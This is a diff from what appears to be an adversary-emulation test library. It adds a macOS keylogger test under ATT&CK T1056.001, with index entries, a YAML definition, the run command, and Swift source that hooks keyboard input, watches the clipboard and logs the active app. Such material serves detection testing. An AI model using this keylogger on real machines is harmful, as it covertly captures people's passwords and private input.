Merge branch 'master' into clr2of8-patch-17

atomics/Indexes/Indexes-CSV/index.csv

@@ -781,6 +781,7 @@ collection,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4
 collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
 collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
 collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
+collection,T1056.001,Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
 collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
 collection,T1123,Audio Capture,2,Registry artefact when application use microphone,7a21cce2-6ada-4f7c-afd9-e1e9c481e44a,command_prompt
 collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
@@ -835,6 +836,7 @@ credential-access,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d
 credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
 credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
 credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
+credential-access,T1056.001,Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
 credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
 credential-access,T1110.001,Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
 credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell

atomics/Indexes/Indexes-CSV/macos-index.csv

@@ -66,6 +66,7 @@ collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or
 collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
 collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
 collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
+collection,T1056.001,Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
 collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
 collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
 collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
@@ -113,6 +114,7 @@ privilege-escalation,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1
 privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
 privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
 privilege-escalation,T1078.003,Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
+credential-access,T1056.001,Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
 credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
 credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
 credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh

atomics/Indexes/Indexes-Markdown/index.md

@@ -1354,6 +1354,7 @@
   - Atomic Test #4: Bash session based keylogger [linux]
   - Atomic Test #5: SSHD PAM keylogger [linux]
   - Atomic Test #6: Auditd keylogger [linux]
+  - Atomic Test #7: MacOS Swift Keylogger [macos]
 - T1602 Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1123 Audio Capture](../../T1123/T1123.md)
@@ -1480,6 +1481,7 @@
   - Atomic Test #4: Bash session based keylogger [linux]
   - Atomic Test #5: SSHD PAM keylogger [linux]
   - Atomic Test #6: Auditd keylogger [linux]
+  - Atomic Test #7: MacOS Swift Keylogger [macos]
 - [T1110.001 Password Guessing](../../T1110.001/T1110.001.md)
   - Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows]
   - Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]

atomics/Indexes/Indexes-Markdown/macos-index.md

@@ -165,7 +165,8 @@
   - Atomic Test #1: Screencapture [macos]
   - Atomic Test #2: Screencapture (silent) [macos]
 - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1056.001 Keylogging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
+  - Atomic Test #7: MacOS Swift Keylogger [macos]
 - T1123 Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -365,7 +366,8 @@
 # credential-access
 - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1056.001 Keylogging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
+  - Atomic Test #7: MacOS Swift Keylogger [macos]
 - T1110.001 Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Matrices/macos-matrix.md

@@ -3,8 +3,8 @@
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
 | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Standard Encoding](../../T1132.001/T1132.001.md) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cron](../../T1053.003/T1053.003.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Keylogging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Keylogging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cron](../../T1053.003/T1053.003.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [AppleScript](../../T1059.002/T1059.002.md) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |

atomics/Indexes/index.yaml

@@ -63001,6 +63001,41 @@ collection:
         cleanup_command: 'systemctl restart auditd
 
           '
+    - name: MacOS Swift Keylogger
+      auto_generated_guid: aee3a097-4c5c-4fff-bbd3-0a705867ae29
+      description: |
+        Utilizes a swift script to log keys to sout. It runs for 5 seconds then dumps the output to standard. Input Monitoring is required.
+        Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring.
+        Referece: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74
+      supported_platforms:
+      - macos
+      input_arguments:
+        swift_src:
+          description: Location of swift script
+          type: Path
+          default: PathToAtomicsFolder/T1056.001/src/MacOSKeylogger.swift
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'swift script must exist at #{swift_src}, and the terminal must
+          have input monitoring permissions.
+
+          '
+        prereq_command: 'if [ -f #{swift_src} ]; then chmod +x #{swift_src}; else
+          exit 1; fi
+
+          '
+        get_prereq_command: 'echo ""
+
+          '
+      executor:
+        command: 'swift #{swift_src} -keylog
+
+          '
+        cleanup_command: 'kill `pgrep swift-frontend`
+
+          '
+        name: bash
+        elevation_required: false
   T1602:
     technique:
       x_mitre_platforms:
@@ -68989,6 +69024,41 @@ credential-access:
         cleanup_command: 'systemctl restart auditd
 
           '
+    - name: MacOS Swift Keylogger
+      auto_generated_guid: aee3a097-4c5c-4fff-bbd3-0a705867ae29
+      description: |
+        Utilizes a swift script to log keys to sout. It runs for 5 seconds then dumps the output to standard. Input Monitoring is required.
+        Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring.
+        Referece: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74
+      supported_platforms:
+      - macos
+      input_arguments:
+        swift_src:
+          description: Location of swift script
+          type: Path
+          default: PathToAtomicsFolder/T1056.001/src/MacOSKeylogger.swift
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'swift script must exist at #{swift_src}, and the terminal must
+          have input monitoring permissions.
+
+          '
+        prereq_command: 'if [ -f #{swift_src} ]; then chmod +x #{swift_src}; else
+          exit 1; fi
+
+          '
+        get_prereq_command: 'echo ""
+
+          '
+      executor:
+        command: 'swift #{swift_src} -keylog
+
+          '
+        cleanup_command: 'kill `pgrep swift-frontend`
+
+          '
+        name: bash
+        elevation_required: false
   T1110.001:
     technique:
       x_mitre_platforms:

atomics/T1056.001/T1056.001.md

@@ -24,6 +24,8 @@ Keylogging is the most prevalent type of input capture, with many different ways
 
 - [Atomic Test #6 - Auditd keylogger](#atomic-test-6---auditd-keylogger)
 
+- [Atomic Test #7 - MacOS Swift Keylogger](#atomic-test-7---macos-swift-keylogger)
+
 
 <br/>
 
@@ -323,4 +325,55 @@ echo ""
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #7 - MacOS Swift Keylogger
+Utilizes a swift script to log keys to sout. It runs for 5 seconds then dumps the output to standard. Input Monitoring is required.
+Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring.
+Referece: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** aee3a097-4c5c-4fff-bbd3-0a705867ae29
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| swift_src | Location of swift script | Path | PathToAtomicsFolder/T1056.001/src/MacOSKeylogger.swift|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+swift #{swift_src} -keylog
+```
+
+#### Cleanup Commands:
+```bash
+kill `pgrep swift-frontend`
+```
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: swift script must exist at #{swift_src}, and the terminal must have input monitoring permissions.
+##### Check Prereq Commands:
+```bash
+if [ -f #{swift_src} ]; then chmod +x #{swift_src}; else exit 1; fi
+```
+##### Get Prereq Commands:
+```bash
+echo ""
+```
+
+
+
+
 <br/>

atomics/T1056.001/T1056.001.yaml

@@ -171,3 +171,31 @@ atomic_tests:
       whoami; ausearch -i --start $(date +"%d/%m/%y %H:%M:%S") 
     cleanup_command: | 
       systemctl restart auditd
+- name: MacOS Swift Keylogger
+  auto_generated_guid: aee3a097-4c5c-4fff-bbd3-0a705867ae29
+  description: |
+    Utilizes a swift script to log keys to sout. It runs for 5 seconds then dumps the output to standard. Input Monitoring is required.
+    Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring.
+    Referece: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74
+  supported_platforms:
+    - macos
+  input_arguments:
+    swift_src:
+        description: Location of swift script
+        type: Path
+        default: PathToAtomicsFolder/T1056.001/src/MacOSKeylogger.swift
+  dependency_executor_name: bash
+  dependencies:
+    - description: |
+        swift script must exist at #{swift_src}, and the terminal must have input monitoring permissions.
+      prereq_command: |
+        if [ -f #{swift_src} ]; then chmod +x #{swift_src}; else exit 1; fi
+      get_prereq_command: |
+        echo ""
+  executor:
+    command: |
+      swift #{swift_src} -keylog
+    cleanup_command: |
+      kill `pgrep swift-frontend`
+    name: bash
+    elevation_required: false

atomics/T1056.001/src/MacOSKeylogger.swift

@@ -0,0 +1,403 @@
+#!/usr/bin/swift
+import Cocoa
+import Foundation
+import IOKit.hid
+import AppKit
+
+
+var capslock = false
+
+var keyMap: [UInt32:[String]]
+{
+    var map = [UInt32:[String]]()
+    map[4] = ["a","A"]
+    map[5] = ["b","B"]
+    map[6] = ["c","C"]
+    map[7] = ["d","D"]
+    map[8] = ["e","E"]
+    map[9] = ["f","F"]
+    map[10] = ["g","G"]
+    map[11] = ["h","H"]
+    map[12] = ["i","I"]
+    map[13] = ["j","J"]
+    map[14] = ["k","K"]
+    map[15] = ["l","L"]
+    map[16] = ["m","M"]
+    map[17] = ["n","N"]
+    map[18] = ["o","O"]
+    map[19] = ["p","P"]
+    map[20] = ["q","Q"]
+    map[21] = ["r","R"]
+    map[22] = ["s","S"]
+    map[23] = ["t","T"]
+    map[24] = ["u","U"]
+    map[25] = ["v","V"]
+    map[26] = ["w","W"]
+    map[27] = ["x","X"]
+    map[28] = ["y","Y"]
+    map[29] = ["z","Z"]
+    map[30] = ["1","!"]
+    map[31] = ["2","@"]
+    map[32] = ["3","#"]
+    map[33] = ["4","$"]
+    map[34] = ["5","%"]
+    map[35] = ["6","^"]
+    map[36] = ["7","&"]
+    map[37] = ["8","*"]
+    map[38] = ["9","("]
+    map[39] = ["0",")"]
+    map[40] = ["\n","\n"]
+    map[41] = ["[ESCAPE]","[ESCAPE]"]
+    map[42] = ["[DELETE|BACKSPACE]","[DELETE|BACKSPACE]"] //
+    map[43] = ["[TAB]","[TAB]"]
+    map[44] = [" "," "]
+    map[45] = ["-","_"]
+    map[46] = ["=","+"]
+    map[47] = ["[","{"]
+    map[48] = ["]","}"]
+    map[49] = ["\\","|"]
+    map[50] = ["",""] // Keyboard Non-US# and ~2
+    map[51] = [";",":"]
+    map[52] = ["'","\""]
+    map[53] = ["`","~"]
+    map[54] = [",","<"]
+    map[55] = [".",">"]
+    map[56] = ["/","?"]
+    map[57] = ["[CAPSLOCK]","[CAPSLOCK]"]
+    map[58] = ["[F1]","[F1]"]
+    map[59] = ["[F2]","[F2]"]
+    map[60] = ["[F3]","[F3]"]
+    map[61] = ["[F4]","[F4]"]
+    map[62] = ["[F5]","[F5]"]
+    map[63] = ["[F6]","[F6]"]
+    map[64] = ["[F7]","[F7]"]
+    map[65] = ["[F8]","[F8]"]
+    map[66] = ["[F9]","[F9]"]
+    map[67] = ["[F10]","[F10]"]
+    map[68] = ["[F11]","[F11]"]
+    map[69] = ["[F12]","[F12]"]
+    map[70] = ["[PRINTSCREEN]","[PRINTSCREEN]"]
+    map[71] = ["[SCROLL-LOCK]","[SCROLL-LOCK]"]
+    map[72] = ["[PAUSE]","[PAUSE]"]
+    map[73] = ["[INSERT]","[INSERT]"]
+    map[74] = ["[HOME]","[HOME]"]
+    map[75] = ["[PAGEUP]","[PAGEUP]"]
+    map[76] = ["[DELETE-FORWARD]","[DELETE-FORWARD]"] //
+    map[77] = ["[END]","[END]"]
+    map[78] = ["[PAGEDOWN]","[PAGEDOWN]"]
+    map[79] = ["[RIGHTARROW]","[RIGHTARROW]"]
+    map[80] = ["[LEFTARROW]","[LEFTARROW]"]
+    map[81] = ["[DOWNARROW]","[DOWNARROW]"]
+    map[82] = ["[UPARROW]","[UPARROW]"]
+    map[83] = ["[NUMLOCK]","[CLEAR]"]
+    // Keypads
+    map[84] = ["/","/"]
+    map[85] = ["*","*"]
+    map[86] = ["-","-"]
+    map[87] = ["+","+"]
+    map[88] = ["[ENTER]","[ENTER]"]
+    map[89] = ["1","[END]"]
+    map[90] = ["2","[DOWNARROW]"]
+    map[91] = ["3","[PAGEDOWN]"]
+    map[92] = ["4","[LEFTARROW]"]
+    map[93] = ["5","5"]
+    map[94] = ["6","[RIGHTARROW]"]
+    map[95] = ["7","[HOME]"]
+    map[96] = ["8","[UPARROW]"]
+    map[97] = ["9","[PAGEUP]"]
+    map[98] = ["0","[INSERT]"]
+    map[99] = [".","[DELETE]"]
+    map[100] = ["",""] //
+    /////
+    map[224] = ["[LCTRL]","[LCTRL]"] // left control
+    map[225] = ["[LSHIFT_PRESS]","[SHIFT_RELEASE]"] // left shift
+    map[226] = ["[LALT]","[LALT]"] // left alt
+    map[227] = ["[LCMD]","[LCMD]"] // left cmd
+    map[228] = ["[RCTRL]","[RCTRL]"] // right control
+    map[229] = ["[RSHIFT_PRESS]","[SHIFT_RELEASE]"] // right shift
+    map[230] = ["[RALT]","[RALT]"] // right alt
+    map[231] = ["[RCMD]","[RCMD]"] // right cmd
+    return map
+}
+
+class SwiftSpy
+{
+    func ActiveApp()
+    {
+        // Hook active application
+        let notificationCenter = NSWorkspace.shared.notificationCenter
+        notificationCenter.addObserver(forName: NSWorkspace.didActivateApplicationNotification, object: nil, queue: OperationQueue.main)
+        {   (notificationCenter: Notification) in
+            
+            let currentApp = notificationCenter.userInfo!["NSWorkspaceApplicationKey"] as! NSRunningApplication
+            print("")
+            print("[+] New Active App:", currentApp.localizedName!)
+        }
+        RunLoop.current.run()
+    }
+    
+    func ClipboardMonitor()
+    {
+        setbuf(__stdoutp, nil)
+        let pasteboard = NSPasteboard.general
+        var changeCount = NSPasteboard.general.changeCount
+        while true {
+            Thread.sleep(forTimeInterval: 1.0)
+            if let clipboardData = pasteboard.string(forType: .string)
+            {
+                if pasteboard.changeCount != changeCount
+                {
+                    print("")
+                    print("[+] Copy event detected at", NSDate(), "(UTC)!")
+                    print("[+] Clipboard Data:", clipboardData)
+                    changeCount = pasteboard.changeCount
+                }
+            }
+        }
+    }
+        
+    // https://stackoverflow.com/questions/7190852/using-iohidmanager-to-get-modifier-key-events
+    // https://stackoverflow.com/questions/30380400/how-to-tap-hook-keyboard-events-in-osx-and-record-which-keyboard-fires-each-even
+    var Handle_IOHIDInputValueCallback: IOHIDValueCallback = { context, result, sender, value in
+        let elem: IOHIDElement = IOHIDValueGetElement(value);
+        let scancode = IOHIDElementGetUsage(elem);
+        
+        if (IOHIDElementGetUsagePage(elem) != 0x07)
+          {
+              return
+          }
+        
+        // invalid keys
+        if (scancode < 4 || scancode > 231)
+        {
+            return;
+        }
+
+        // returns 1 when a key was pressed and 0 when a key is released
+        let pressed = IOHIDValueGetIntegerValue(value);
+        if (pressed == 1)
+        {
+            // modifying caplocks variable and return
+            if (scancode == 57)
+            {
+                capslock = !capslock
